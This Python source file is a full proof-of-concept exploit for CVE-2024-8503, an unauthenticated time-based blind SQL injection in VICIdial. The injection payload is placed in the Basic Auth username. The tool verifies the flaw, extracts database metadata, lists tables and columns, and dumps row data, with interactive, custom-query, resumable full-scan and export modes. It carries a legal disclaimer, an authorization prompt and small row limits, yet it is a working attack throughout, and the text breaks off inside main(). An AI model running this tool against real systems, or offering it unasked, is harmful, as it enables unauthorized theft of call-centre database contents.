#!/usr/bin/env python3 """ VICIdial CVE-2024-8503 Proof of Concept Tool ============================================= Unauthenticated SQL Injection in VERM_AJAX_functions.php LEGAL DISCLAIMER: This tool is provided for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal. Users must obtain explicit written permission before testing any systems they do not own. The authors assume no liability for misuse or damage caused by this tool. Author: Machine-Farmer CVE: CVE-2024-8503 Date: November 2024 """ import argparse import requests import time import base64 import statistics import sys import json import csv import os import pickle from datetime import datetime from typing import Optional, Dict, List, Tuple requests.packages.urllib3.disable_warnings() # ============================================================================ # CONFIGURATION - STRICT LIMITS FOR SECURITY # ============================================================================ VERSION = "1.0.1" CHAR_MIN = 32 CHAR_MAX = 126 MAX_LENGTH = 250 MAX_CELL_LENGTH = 100 BASELINE_ITERS = 4 SLEEP_MULTIPLIER = 30 # Stricter limits for PoC security DEFAULT_ROW_LIMIT = 10 MAX_ROW_LIMIT = 10 DEFAULT_COLUMN_LIMIT = 10 MAX_COLUMN_LIMIT = 10 DEFAULT_TABLE_LIMIT = 10 # Auto-extraction limits AUTO_COLUMN_LIMIT = 10 AUTO_ROW_LIMIT = 10 METADATA_QUERIES = { 'db_version': '@@version', 'database': 'DATABASE()', 'db_user': 'CURRENT_USER()', 'hostname': '@@hostname', 'db_privileges': 'SELECT GROUP_CONCAT(privilege_type) FROM information_schema.user_privileges WHERE grantee LIKE CONCAT("%",SUBSTRING_INDEX(CURRENT_USER(),"@",1),"%") LIMIT 1', 'table_count': 'SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=DATABASE()', } # ============================================================================ # STATE MANAGEMENT FOR RESUMABLE SCANS # ============================================================================ class ScanState: """Manages scan state for resumable operations""" def __init__(self, state_file: str = ".vicidial_scan_state.json"): self.state_file = state_file self.state = { 'target': None, 'completed_steps': [], 'metadata_results': {}, 'tables_list': [], 'table_columns': {}, # table -> [columns] 'table_data': {}, # table -> {column -> [rows]} 'current_step': None, 'last_updated': None } self.load_state() def load_state(self): """Load previous scan state if exists""" if os.path.exists(self.state_file): try: with open(self.state_file, 'r', encoding='utf-8') as f: self.state = json.load(f) print(f"[+] Loaded previous scan state from {self.state_file}") except Exception as e: print(f"[!] Could not load state file: {e}") elif os.path.exists(".vicidial_scan_state.pkl"): print("[!] Legacy pickle state file found; ignoring for safety. Remove it if not needed.") def save_state(self): """Save current scan state""" self.state['last_updated'] = datetime.now().isoformat() try: with open(self.state_file, 'w', encoding='utf-8') as f: json.dump(self.state, f, indent=2) except Exception as e: print(f"[!] Could not save state: {e}") def clear_state(self): """Clear saved state""" if os.path.exists(self.state_file): os.remove(self.state_file) self.state = { 'target': None, 'completed_steps': [], 'metadata_results': {}, 'tables_list': [], 'table_columns': {}, 'table_data': {}, 'current_step': None, 'last_updated': None } def is_step_completed(self, step: str) -> bool: """Check if a step was already completed""" return step in self.state['completed_steps'] def mark_step_completed(self, step: str): """Mark a step as completed""" if step not in self.state['completed_steps']: self.state['completed_steps'].append(step) self.save_state() def update_metadata(self, key: str, value: str): """Update metadata results""" self.state['metadata_results'][key] = value self.save_state() def get_metadata(self, key: str) -> Optional[str]: """Get saved metadata""" return self.state['metadata_results'].get(key) def update_tables(self, tables: List[str]): """Update tables list""" self.state['tables_list'] = tables self.save_state() def get_tables(self) -> List[str]: """Get saved tables""" return self.state.get('tables_list', []) def update_table_columns(self, table: str, columns: List[str]): """Update columns for a table""" if 'table_columns' not in self.state: self.state['table_columns'] = {} self.state['table_columns'][table] = columns self.save_state() def get_table_columns(self, table: str) -> List[str]: """Get saved columns for table""" return self.state.get('table_columns', {}).get(table, []) def update_table_data(self, table: str, column: str, rows: List[str]): """Update row data for table/column""" if 'table_data' not in self.state: self.state['table_data'] = {} if table not in self.state['table_data']: self.state['table_data'][table] = {} self.state['table_data'][table][column] = rows self.save_state() def get_table_data(self, table: str, column: str) -> List[str]: """Get saved row data for table/column""" return self.state.get('table_data', {}).get(table, {}).get(column, []) def set_target(self, target: str): """Set target URL""" self.state['target'] = target self.save_state() def get_target(self) -> Optional[str]: """Get saved target""" return self.state.get('target') def show_resume_prompt(self) -> bool: """Show resume prompt and get user choice""" if not self.state.get('target'): return False print("\n" + "="*70) print("PREVIOUS SCAN DETECTED") print("="*70) print(f"Target: {self.state['target']}") print(f"Last Updated: {self.state.get('last_updated', 'Unknown')}") print(f"Completed Steps: {len(self.state['completed_steps'])}") if self.state['completed_steps']: for step in self.state['completed_steps']: print(f" ✓ {step}") print(f"Tables Found: {len(self.state.get('tables_list', []))}") print(f"Tables with Columns: {len(self.state.get('table_columns', {}))}") print("="*70) choice = input("\nResume from previous scan? (y/n/clear): ").strip().lower() if choice == 'clear': self.clear_state() print("[+] Scan state cleared. Starting fresh.") return False return choice == 'y' # ============================================================================ # NOTIFICATION SYSTEM # ============================================================================ def send_notification(title: str, message: str): """Send desktop notification when scan completes""" try: if sys.platform == 'darwin': os.system(f"""osascript -e 'display notification "{message}" with title "{title}"'""") elif sys.platform == 'linux': os.system(f'notify-send "{title}" "{message}"') elif sys.platform == 'win32': try: from win10toast import ToastNotifier toaster = ToastNotifier() toaster.show_toast(title, message, duration=10) except ImportError: print('\a') else: print('\a') except Exception: print('\a') def play_completion_sound(): """Play a sound when scan completes""" try: print('\a') except Exception: pass # ============================================================================ # CORE EXPLOITATION ENGINE # ============================================================================ class SQLInjectionEngine: """Core engine for time-based blind SQL injection""" def __init__(self, target: str, params: dict, sleep_duration: int): self.target = target self.params = params self.sleep_duration = sleep_duration self.timing_threshold = sleep_duration * 0.8 @staticmethod def make_auth_header(user: str, pwd: str = 'x') -> dict: """Create Basic Auth header with injected username""" cred = f"{user}:{pwd}" return {'Authorization': 'Basic ' + base64.b64encode(cred.encode()).decode()} def probe(self, headers: dict, timeout: int = 30) -> Tuple[Optional[float], Optional[int]]: """Execute single HTTP probe and measure response time""" try: start = time.perf_counter() r = requests.get(self.target, params=self.params, headers=headers, verify=False, timeout=timeout) elapsed = time.perf_counter() - start return elapsed, r.status_code except Exception: return None, None def test_condition(self, query: str, position: int, threshold: int) -> Optional[bool]: """Test if ASCII value at position is <= threshold""" condition = f"ASCII(SUBSTRING(({query}),{position},1))<={threshold}" inner_query = f"SELECT IF({condition},sleep({self.sleep_duration}),NULL)" payload = f"goolicker', '', ({inner_query}));#:" headers = {'User-Agent': 'KoreLogic-Test', **self.make_auth_header(payload)} elapsed, _ = self.probe(headers) if elapsed is None: return None return elapsed >= self.timing_threshold def extract_character(self, query: str, position: int, max_retries: int = 3) -> Optional[str]: """Extract single character at position using binary search with retry logic""" for attempt in range(max_retries): try: exists = self.test_condition(query, position, CHAR_MIN - 1) if exists is None: if attempt < max_retries - 1: print(f"\n[!] Network error at position {position}, retry {attempt + 1}/{max_retries}...") time.sleep(2) continue raise RuntimeError(f"Network error at position {position} after {max_retries} retries") if exists: return None low, high = CHAR_MIN, CHAR_MAX char_ord = None while low <= high: mid = (low + high) // 2 is_lte = self.test_condition(query, position, mid) if is_lte is None: if attempt < max_retries - 1: print(f"\n[!] Network error during binary search, retry {attempt + 1}/{max_retries}...") time.sleep(2) break raise RuntimeError(f"Network error at position {position} after {max_retries} retries") if is_lte: char_ord = mid high = mid - 1 else: low = mid + 1 if char_ord is None: if attempt < max_retries - 1: continue return None current = self.test_condition(query, position, char_ord) previous = self.test_condition(query, position, char_ord - 1) if current and not previous: return chr(char_ord) for ordinal in range(max(CHAR_MIN, char_ord - 2), min(CHAR_MAX, char_ord + 2) + 1): curr = self.test_condition(query, position, ordinal) prev = self.test_condition(query, position, ordinal - 1) if curr and not prev: return chr(ordinal) return None except RuntimeError as e: if attempt < max_retries - 1: print(f"\n[!] Error: {e}, retry {attempt + 1}/{max_retries}...") time.sleep(2) continue raise return None def extract_string(self, query: str, maxlen: int = MAX_LENGTH, show_progress: bool = True) -> str: """Extract complete string from SQL query result""" result = [] for pos in range(1, maxlen + 1): char = self.extract_character(query, pos) if char is None: break result.append(char) if show_progress: sys.stdout.write(char) sys.stdout.flush() return ''.join(result) # ============================================================================ # VULNERABILITY SCANNER # ============================================================================ class VulnerabilityScanner: """Main scanner for CVE-2024-8503""" def __init__(self, url: str, path: str): self.target = url.rstrip('/') + path self.params = {'function': 'log_custom_report'} self.engine = None self.baseline_avg = 0.0 self.sleep_duration = 0 def calibrate_timing(self, iterations: int = BASELINE_ITERS) -> bool: """Calibrate baseline timing and determine sleep duration""" print("[*] Calibrating timing baseline...") baseline_times = [] for i in range(iterations): try: start = time.perf_counter() response = requests.get(self.target, params=self.params, headers={'User-Agent': 'KoreLogic-Test'}, verify=False, timeout=30) elapsed = time.perf_counter() - start baseline_times.append(elapsed) print(f" Attempt {i+1}/{iterations}: {elapsed:.3f}s (Status: {response.status_code})") time.sleep(0.25) except requests.exceptions.Timeout: print(f"[-] Timeout on attempt {i+1}/{iterations}") if i < iterations - 1: print(" Retrying...") continue else: print("[-] Too many timeouts during calibration") return False except requests.exceptions.ConnectionError as e: print(f"[-] Connection error on attempt {i+1}/{iterations}: {e}") if i < iterations - 1: print(" Retrying...") time.sleep(1) continue else: print("[-] Could not connect to target") return False except Exception as e: print(f"[-] Unexpected error during calibration: {e}") return False if not baseline_times: print("[-] No successful calibration attempts") return False self.baseline_avg = statistics.mean(baseline_times) self.sleep_duration = max(2, round(self.baseline_avg * SLEEP_MULTIPLIER)) print(f"[+] Baseline: {self.baseline_avg:.3f}s | Sleep: {self.sleep_duration}s") return True def verify_vulnerability(self) -> bool: """Verify target is vulnerable""" print("[*] Testing vulnerability...") inj_user = f"', '', sleep({self.sleep_duration}));#:" headers = { 'User-Agent': 'KoreLogic-Test', **SQLInjectionEngine.make_auth_header(inj_user) } try: start = time.perf_counter() requests.get(self.target, params=self.params, headers=headers, verify=False, timeout=self.sleep_duration + 10) elapsed = time.perf_counter() - start if elapsed >= (self.sleep_duration * 0.8): print(f"[+] Vulnerability CONFIRMED (delay: {elapsed:.3f}s)") return True else: print(f"[-] Vulnerability NOT detected (delay: {elapsed:.3f}s)") return False except Exception as e: print(f"[-] Error during verification: {e}") return False def initialize(self, skip_vuln_check: bool = False) -> bool: """Initialize scanner and verify vulnerability""" if not self.calibrate_timing(): return False if not skip_vuln_check: if not self.verify_vulnerability(): return False self.engine = SQLInjectionEngine(self.target, self.params, self.sleep_duration) return True def extract_metadata(self, query_name: str, query: str) -> Optional[str]: """Extract metadata using SQL query""" if not self.engine: return None full_query = query if query.startswith('SELECT') else f"SELECT {query}" try: print(f"\n[+] Extracting: {query_name}") print(f" Query: {query}") sys.stdout.write(f" Value: ") sys.stdout.flush() result = self.engine.extract_string(full_query) print(f"\n Result: {repr(result)}") return result except RuntimeError as e: print(f"\n ERROR: {e}") return None def list_tables(self, limit: int = DEFAULT_TABLE_LIMIT) -> List[str]: """List table names from database""" limit = min(max(limit, 1), DEFAULT_TABLE_LIMIT) query = ( "SELECT GROUP_CONCAT(table_name SEPARATOR ',') " "FROM (SELECT table_name FROM information_schema.tables " "WHERE table_schema=DATABASE() ORDER BY table_name LIMIT {limit}) AS tbls" ).format(limit=limit) print(f"\n[+] Listing tables (limit: {limit})...") sys.stdout.write(" Tables: ") sys.stdout.flush() try: tables_str = self.engine.extract_string(query) print("\n") if not tables_str: return [] return tables_str.split(',') except RuntimeError as e: print(f"\n ERROR: {e}") return [] def get_table_columns(self, table: str, limit: int = DEFAULT_COLUMN_LIMIT) -> List[str]: """Get column names for a table""" if limit > MAX_COLUMN_LIMIT: print(f" [!] Limit capped at {MAX_COLUMN_LIMIT} columns for PoC") limit = MAX_COLUMN_LIMIT query = f"SELECT GROUP_CONCAT(column_name SEPARATOR ',') FROM (SELECT column_name FROM information_schema.columns WHERE table_schema=DATABASE() AND table_name='{table}' LIMIT {limit}) AS cols" print(f"\n[+] Getting columns for table: {table} (limit: {limit})") sys.stdout.write(" Columns: ") sys.stdout.flush() try: cols_str = self.engine.extract_string(query) print("\n") if not cols_str: return [] return cols_str.split(',') except RuntimeError as e: print(f"\n ERROR: {e}") return [] def extract_table_data(self, table: str, columns: List[str], limit: int = DEFAULT_ROW_LIMIT, start_position: int = 0) -> List[Dict[str, str]]: """Extract data from table with improved error handling""" if limit > MAX_ROW_LIMIT: print(f" [!] Row limit capped at {MAX_ROW_LIMIT} for PoC") limit = MAX_ROW_LIMIT print(f"\n[+] Extracting data from: {table}") print(f" Columns: {', '.join(columns)}") print(f" Starting from row: {start_position + 1}") print(f" Rows to extract: {limit}\n") results = [] consecutive_errors = 0 max_consecutive_errors = 3 for offset in range(limit): row_num = start_position + offset print(f"[Row {row_num + 1} (offset {offset + 1}/{limit})]") row_data = {} row_has_data = False for col in columns: query = f"SELECT {col} FROM {table} LIMIT {row_num},1" sys.stdout.write(f" {col:.<25} ") sys.stdout.flush() try: value = self.engine.extract_string(query, maxlen=MAX_CELL_LENGTH, show_progress=False) row_data[col] = value if value else "NULL" if value: row_has_data = True print(value if value else "NULL") consecutive_errors = 0 # Reset error counter on success except RuntimeError as e: print(f"ERROR: {str(e)[:50]}") row_data[col] = "ERROR" consecutive_errors += 1 if consecutive_errors >= max_consecutive_errors: print(f"\n[!] Too many consecutive errors ({consecutive_errors}), stopping extraction") print(f"[!] Successfully extracted {len(results)} rows before errors") return results except KeyboardInterrupt: print("\n[!] Extraction interrupted by user") print(f"[!] Partial results: {len(results)} rows extracted") return results except Exception as e: print(f"UNEXPECTED ERROR: {str(e)[:50]}") row_data[col] = "ERROR" consecutive_errors += 1 if consecutive_errors >= max_consecutive_errors: print(f"\n[!] Too many consecutive errors, stopping extraction") return results # Only add row if it has some actual data if row_has_data or any(v not in ["NULL", "ERROR"] for v in row_data.values()): results.append(row_data) else: print(f" [!] Row {row_num + 1} appears empty, may have reached end of table") # If we get an empty row, we might be past the end of the table # if row_num > start_position: # Don't stop if it's the first row at new position # break print() return results def auto_extract_table(self, table: str) -> Tuple[List[str], List[Dict[str, str]]]: """Automatically discover columns and extract data from table""" print(f"\n[+] Auto-extracting from table: {table}") print(f" Step 1: Discovering columns (limit: {AUTO_COLUMN_LIMIT})...") columns = self.get_table_columns(table, AUTO_COLUMN_LIMIT) if not columns: print("[-] No columns found") return [], [] print(f" Found {len(columns)} columns: {', '.join(columns)}") print(f" Step 2: Extracting data (limit: {AUTO_ROW_LIMIT} rows)...\n") data = self.extract_table_data(table, columns, AUTO_ROW_LIMIT) return columns, data # ============================================================================ # OUTPUT FORMATTERS # ============================================================================ class OutputFormatter: """Format and display extraction results""" @staticmethod def print_banner(): """Print tool banner""" banner = """ ╔═══════════════════════════════════════════════════════════════════════╗ ║ ║ ║ VICIdial CVE-2024-8503 Proof of Concept Tool ║ ║ Unauthenticated SQL Injection Exploit ║ ║ ║ ║ Version: 1.0.1 (Secure Edition) ║ ║ Author: Machine-Farmer ║ ║ For Authorized Security Testing Only ║ ║ ║ ╚═══════════════════════════════════════════════════════════════════════╝ """ print(banner) @staticmethod def print_metadata_summary(results: Dict[str, str]): """Print metadata extraction summary""" print("\n" + "="*70) print("METADATA EXTRACTION SUMMARY") print("="*70) for key, value in results.items(): label = key.replace('_', ' ').title() if key == 'table_names' and value and value != 'ERROR': print(f"{label}:") for idx, tbl in enumerate(value.split(',')[:15], 1): print(f" {idx:2d}. {tbl}") else: display_val = value[:60] + "..." if len(value) > 60 else value print(f" {label:.<25} {display_val}") print("="*70) @staticmethod def print_table_list(tables: List[str]): """Print list of tables""" print("\n" + "="*70) print(f"TABLES FOUND: {len(tables)}") print("="*70) for idx, table in enumerate(tables, 1): print(f" {idx:2d}. {table}") print("="*70) @staticmethod def print_columns_list(table: str, columns: List[str]): """Print list of columns""" print("\n" + "="*70) print(f"COLUMNS IN TABLE: {table}") print("="*70) for idx, col in enumerate(columns, 1): print(f" {idx:2d}. {col}") print("="*70) @staticmethod def print_table_data(table: str, columns: List[str], data: List[Dict[str, str]]): """Print extracted table data""" if not data: print("[-] No data extracted") return widths = {col: max(len(col), 10) for col in columns} for row in data: for col in columns: value = str(row.get(col, '')) widths[col] = max(widths[col], min(len(value), 50)) total_width = sum(widths.values()) + len(columns) * 3 + 1 print("\n" + "="*total_width) print(f"DATA FROM TABLE: {table}".center(total_width)) print("="*total_width) header = " | ".join(col.ljust(widths[col]) for col in columns) print(f"| {header} |") print("="*total_width) for row in data: row_values = [] for col in columns: value = str(row.get(col, 'N/A')) if len(value) > widths[col]: value = value[:widths[col]-3] + "..." row_values.append(value.ljust(widths[col])) row_str = " | ".join(row_values) print(f"| {row_str} |") print("="*total_width) print(f"\nTotal rows: {len(data)}\n") @staticmethod def export_json(data: dict, filename: str): """Export results to JSON""" with open(filename, 'w') as f: json.dump(data, f, indent=2) print(f"[+] Results exported to: {filename}") @staticmethod def export_csv(columns: List[str], data: List[Dict[str, str]], filename: str): """Export table data to CSV""" with open(filename, 'w', newline='') as f: writer = csv.DictWriter(f, fieldnames=columns) writer.writeheader() writer.writerows(data) print(f"[+] Data exported to: {filename}") # ============================================================================ # INTERACTIVE MODE # ============================================================================ class InteractiveMode: """Interactive menu-driven interface""" def __init__(self, scanner: VulnerabilityScanner, scan_state: Optional[ScanState] = None): self.scanner = scanner self.scan_state = scan_state if scan_state else ScanState() self.metadata_queries = METADATA_QUERIES def show_main_menu(self): """Display main menu""" print("\n" + "="*70) print("MAIN MENU") print("="*70) print(" 1. Extract Metadata") print(" 2. List Tables") print(" 3. Get Table Columns") print(" 4. Extract Table Data (Manual)") print(" 5. Auto-Extract Table Data (Discover + Extract)") print(" 6. Custom Query") print(" 7. Extract All (Full Scan - Resumable)") print(" 8. View Scan State") print(" 9. Clear Scan State") print(" 0. Exit") print("="*70) def show_metadata_menu(self): """Display metadata extraction menu""" print("\n" + "="*70) print("METADATA EXTRACTION") print("="*70) print(" 1. Database Version") print(" 2. Database Name") print(" 3. Database User") print(" 4. Hostname") print(" 5. User Privileges") print(" 6. Table Count") print(" 7. Extract All Metadata") print(" 0. Back to Main Menu") print("="*70) def extract_metadata_interactive(self): """Interactive metadata extraction""" while True: self.show_metadata_menu() choice = input("\nSelect option: ").strip() if choice == '0': break elif choice == '1': result = self.scanner.extract_metadata('Database Version', self.metadata_queries['db_version']) if result: self.scan_state.update_metadata('db_version', result) elif choice == '2': result = self.scanner.extract_metadata('Database Name', self.metadata_queries['database']) if result: self.scan_state.update_metadata('database', result) elif choice == '3': result = self.scanner.extract_metadata('Database User', self.metadata_queries['db_user']) if result: self.scan_state.update_metadata('db_user', result) elif choice == '4': result = self.scanner.extract_metadata('Hostname', self.metadata_queries['hostname']) if result: self.scan_state.update_metadata('hostname', result) elif choice == '5': result = self.scanner.extract_metadata('User Privileges', self.metadata_queries['db_privileges']) if result: self.scan_state.update_metadata('db_privileges', result) elif choice == '6': result = self.scanner.extract_metadata('Table Count', self.metadata_queries['table_count']) if result: self.scan_state.update_metadata('table_count', result) elif choice == '7': results = {} for name, query in self.metadata_queries.items(): result = self.scanner.extract_metadata(name, query) if result: results[name] = result self.scan_state.update_metadata(name, result) OutputFormatter.print_metadata_summary(results) else: print("[-] Invalid option") def list_tables_interactive(self): """Interactive table listing""" print(f"\n[+] Listing tables (limit: {DEFAULT_TABLE_LIMIT})...") tables = self.scanner.list_tables() if tables: self.scan_state.update_tables(tables) OutputFormatter.print_table_list(tables) def get_columns_interactive(self): """Interactive column discovery""" table = input("\nEnter table name: ").strip() if not table: print("[-] Table name required") return limit_input = input(f"Number of columns to retrieve (max {MAX_COLUMN_LIMIT}) [{DEFAULT_COLUMN_LIMIT}]: ").strip() limit = int(limit_input) if limit_input else DEFAULT_COLUMN_LIMIT columns = self.scanner.get_table_columns(table, limit) if columns: self.scan_state.update_table_columns(table, columns) OutputFormatter.print_columns_list(table, columns) def extract_data_interactive(self): """Interactive data extraction""" table = input("\nEnter table name: ").strip() if not table: print("[-] Table name required") return columns_str = input("Enter column names (comma-separated): ").strip() if not columns_str: print("[-] Column names required") return columns = [c.strip() for c in columns_str.split(',')] limit_input = input(f"Number of rows to extract (max {MAX_ROW_LIMIT}) [{DEFAULT_ROW_LIMIT}]: ").strip() limit = int(limit_input) if limit_input else DEFAULT_ROW_LIMIT data = self.scanner.extract_table_data(table, columns, limit) OutputFormatter.print_table_data(table, columns, data) export = input("\nExport to CSV? (y/n): ").strip().lower() if export == 'y': filename = f"{table}_{datetime.now().strftime('%Y%m%d_%H%M%S')}.csv" OutputFormatter.export_csv(columns, data, filename) def auto_extract_interactive(self): """Interactive auto-extraction""" table = input("\nEnter table name: ").strip() if not table: print("[-] Table name required") return columns, data = self.scanner.auto_extract_table(table) if columns: self.scan_state.update_table_columns(table, columns) OutputFormatter.print_table_data(table, columns, data) export = input("\nExport to CSV? (y/n): ").strip().lower() if export == 'y': filename = f"{table}_{datetime.now().strftime('%Y%m%d_%H%M%S')}.csv" OutputFormatter.export_csv(columns, data, filename) def custom_query_interactive(self): """Execute custom SQL query""" print("\n[!] Enter SQL query (SELECT only, no modifications)") query = input("Query: ").strip() if not query: print("[-] Query required") return if not query.upper().startswith('SELECT'): query = f"SELECT {query}" print(f"\n[+] Executing: {query}") sys.stdout.write("[+] Result: ") sys.stdout.flush() try: result = self.scanner.engine.extract_string(query) print(f"\n[+] {repr(result)}") except Exception as e: print(f"\n[-] Error: {e}") def view_scan_state(self): """View current scan state""" print("\n" + "="*70) print("CURRENT SCAN STATE") print("="*70) print(f"Target: {self.scan_state.get_target()}") print(f"Last Updated: {self.scan_state.state.get('last_updated', 'Never')}") print(f"\nCompleted Steps: {len(self.scan_state.state['completed_steps'])}") for step in self.scan_state.state['completed_steps']: print(f" ✓ {step}") print(f"\nMetadata Collected: {len(self.scan_state.state['metadata_results'])}") for key, val in self.scan_state.state['metadata_results'].items(): print(f" • {key}: {val[:50]}...") print(f"\nTables Found: {len(self.scan_state.get_tables())}") print(f"Tables with Columns: {len(self.scan_state.state.get('table_columns', {}))}") print("="*70) def clear_scan_state_menu(self): """Clear scan state with confirmation""" confirm = input("\nAre you sure you want to clear all scan state? (yes/no): ").strip().lower() if confirm == 'yes': self.scan_state.clear_state() print("[+] Scan state cleared successfully") else: print("[+] Clear operation cancelled") def full_scan(self): """Perform comprehensive full scan with resumability""" print("\n" + "="*70) print("FULL SCAN - COMPREHENSIVE DATA EXTRACTION") print("="*70) print(f"This will extract:") print(f" • All metadata") print(f" • Tables (up to {DEFAULT_TABLE_LIMIT})") print(f" • Columns for each table (up to {MAX_COLUMN_LIMIT} per table)") print(f" • Rows for each column (up to {MAX_ROW_LIMIT} per table)") print(f"\n[!] This operation is RESUMABLE - progress is saved automatically") print("="*70) confirm = input("\nProceed with full scan? (y/n): ").strip().lower() if confirm != 'y': print("[+] Full scan cancelled") return self.scan_state.set_target(self.scanner.target) all_results = { 'timestamp': datetime.now().isoformat(), 'target': self.scanner.target, 'metadata': {}, 'tables': {} } # Step 1: Extract metadata if not self.scan_state.is_step_completed('metadata'): print("\n[STEP 1/3] Extracting metadata...") for name, query in self.metadata_queries.items(): cached = self.scan_state.get_metadata(name) if cached: print(f"[+] Using cached {name}: {cached}") all_results['metadata'][name] = cached else: result = self.scanner.extract_metadata(name, query) if result: self.scan_state.update_metadata(name, result) all_results['metadata'][name] = result self.scan_state.mark_step_completed('metadata') OutputFormatter.print_metadata_summary(all_results['metadata']) else: print("\n[STEP 1/3] Metadata already extracted (resuming)") all_results['metadata'] = self.scan_state.state['metadata_results'] # Step 2: List all tables if not self.scan_state.is_step_completed('tables'): print("\n[STEP 2/3] Listing all tables...") tables = self.scanner.list_tables(DEFAULT_TABLE_LIMIT) if tables: self.scan_state.update_tables(tables) OutputFormatter.print_table_list(tables) self.scan_state.mark_step_completed('tables') else: print("\n[STEP 2/3] Tables already listed (resuming)") tables = self.scan_state.get_tables() print(f"[+] Using cached {len(tables)} tables") # Step 3: Extract columns and data for each table print(f"\n[STEP 3/3] Extracting data from {len(tables)} tables...") print(f"[!] Limit: {MAX_COLUMN_LIMIT} columns, {MAX_ROW_LIMIT} rows per table") for idx, table in enumerate(tables, 1): print(f"\n{'='*70}") print(f"Processing Table {idx}/{len(tables)}: {table}") print(f"{'='*70}") # Check if columns already extracted cached_columns = self.scan_state.get_table_columns(table) if cached_columns: print(f"[+] Using cached columns for {table}: {cached_columns}") columns = cached_columns else: columns = self.scanner.get_table_columns(table, MAX_COLUMN_LIMIT) if columns: self.scan_state.update_table_columns(table, columns) if not columns: print(f"[-] No columns found for {table}, skipping...") continue # Extract data data = self.scanner.extract_table_data(table, columns, MAX_ROW_LIMIT) if data: all_results['tables'][table] = { 'columns': columns, 'rows': data } OutputFormatter.print_table_data(table, columns, data) # Export final results filename = f"full_scan_{datetime.now().strftime('%Y%m%d_%H%M%S')}.json" OutputFormatter.export_json(all_results, filename) print("\n" + "="*70) print("FULL SCAN COMPLETE") print("="*70) print(f"[+] Metadata items: {len(all_results['metadata'])}") print(f"[+] Tables processed: {len(all_results['tables'])}") print(f"[+] Results saved to: {filename}") print("="*70) def run(self): """Run interactive mode""" while True: self.show_main_menu() choice = input("\nSelect option: ").strip() if choice == '0': print("\n[+] Exiting...") break elif choice == '1': self.extract_metadata_interactive() elif choice == '2': self.list_tables_interactive() elif choice == '3': self.get_columns_interactive() elif choice == '4': self.extract_data_interactive() elif choice == '5': self.auto_extract_interactive() elif choice == '6': self.custom_query_interactive() elif choice == '7': self.full_scan() elif choice == '8': self.view_scan_state() elif choice == '9': self.clear_scan_state_menu() else: print("[-] Invalid option") # ============================================================================ # COMMAND LINE INTERFACE # ============================================================================ def parse_arguments(): """Parse command line arguments""" parser = argparse.ArgumentParser( description='VICIdial CVE-2024-8503 Proof of Concept Tool', formatter_class=argparse.RawDescriptionHelpFormatter, epilog=''' Examples: # Interactive mode %(prog)s --url https://target.com --interactive # Extract metadata %(prog)s --url https://target.com --metadata db_version database db_user # List tables %(prog)s --url https://target.com --list-tables # Get columns %(prog)s --url https://target.com --get-columns call_log # Extract table data %(prog)s --url https://target.com --table call_log --columns uniqueid,channel --rows 3 # Auto-extract table data %(prog)s --url https://target.com --auto-extract call_log # Full scan (resumable) %(prog)s --url https://target.com --full-scan # Self-check (no network activity) %(prog)s --self-check LEGAL NOTICE: This tool is for authorized security testing only. Unauthorized access to computer systems is illegal. Obtain written permission before testing. ''' ) parser.add_argument('--url', help='Target URL') parser.add_argument('--path', default='/VERM/VERM_AJAX_functions.php', help='Path to vulnerable endpoint') parser.add_argument('--interactive', action='store_true', help='Run in interactive mode') parser.add_argument('--metadata', nargs='+', choices=['db_version', 'database', 'db_user', 'hostname', 'db_privileges', 'table_count', 'all'], help='Extract metadata') parser.add_argument('--list-tables', action='store_true', help='List database tables') parser.add_argument('--get-columns', metavar='TABLE', help='Get columns for table') parser.add_argument('--column-limit', type=int, default=DEFAULT_COLUMN_LIMIT, help=f'Number of columns (max {MAX_COLUMN_LIMIT}, default: {DEFAULT_COLUMN_LIMIT})') parser.add_argument('--table', help='Table to extract data from') parser.add_argument('--columns', help='Comma-separated column names') parser.add_argument('--rows', type=int, default=DEFAULT_ROW_LIMIT, help=f'Number of rows (max {MAX_ROW_LIMIT}, default: {DEFAULT_ROW_LIMIT})') parser.add_argument('--auto-extract', metavar='TABLE', help='Auto-extract table data') parser.add_argument('--custom-query', help='Execute custom SQL query') parser.add_argument('--full-scan', action='store_true', help='Perform full scan (resumable)') parser.add_argument('--skip-vuln-check', action='store_true', help='Skip vulnerability verification') parser.add_argument('--export', help='Export results to file') parser.add_argument('--self-check', action='store_true', help='Print configuration and exit (no network)') return parser.parse_args() def run_self_check(): """Print configuration and exit without any network activity""" print("\n[+] Self-check (no network activity)") print(f"[+] Version: {VERSION}") print(f"[+] Limits: Tables={DEFAULT_TABLE_LIMIT}, Columns={MAX_COLUMN_LIMIT}, Rows={MAX_ROW_LIMIT}") print(f"[+] Max metadata length: {MAX_LENGTH}") print(f"[+] Max cell length: {MAX_CELL_LENGTH}") print(f"[+] State file: .vicidial_scan_state.json") print(f"[+] Metadata keys: {', '.join(sorted(METADATA_QUERIES.keys()))}") def main(): """Main entry point""" start_time = time.time() OutputFormatter.print_banner() args = parse_arguments() if args.self_check: run_self_check() return if not args.url: print("[-] Missing required argument: --url") return print("\n[!] LEGAL DISCLAIMER:") print(" This tool is for AUTHORIZED SECURITY TESTING ONLY.") print(" Unauthorized access is ILLEGAL. Proceed only with written permission.\n") response = input("Do you have authorization to test this target? (yes/no): ").strip().lower() if response != 'yes': print("\n[!] Authorization required. Exiting.") return scan_state = ScanState() # Check for resumable scan if scan_state.get_target() and scan_state.get_target() == (args.url.rstrip('/') + args.path): if scan_state.show_resume_prompt(): print("[+] Resuming from previous scan...") else: scan_state.clear_state() print("\n[+] Initializing scanner...") print(f"[+] Target: {args.url}{args.path}") print(f"[+] Limits: Tables={DEFAULT_TABLE_LIMIT}, Columns={MAX_COLUMN_LIMIT}, Rows={MAX_ROW_LIMIT}") scanner = VulnerabilityScanner(args.url, args.path) if not scanner.initialize(skip_vuln_check=args.skip_vuln_check): print("\n[-] Initialization failed. Exiting.") send_notification("VICIdial PoC", "Scan failed - initialization error") return scan_state.set_target(scanner.target) if args.interactive: interactive = InteractiveMode(scanner, scan_state) interactive.run() duration = time.time() - start_time print(f"\n[+] Total time: {duration/60:.1f} minutes") send_notification("VICIdial PoC", f"Interactive scan completed in {duration/60:.1f} minutes") play_completion_sound() return metadata_queries = METADATA_QUERIES if args.metadata: results = {} queries = metadata_queries if 'all' in args.metadata else {k: metadata_queries[k] for k in args.metadata if k in metadata_queries} for name, query in queries.items(): result = scanner.extract_metadata(name, query) if result: results[name] = result scan_state.update_metadata(name, result) OutputFormatter.print_metadata_summary(results) if args.export: OutputFormatter.export_json(results, args.export) if args.list_tables: tables = scanner.list_tables() if tables: scan_state.update_tables(tables) 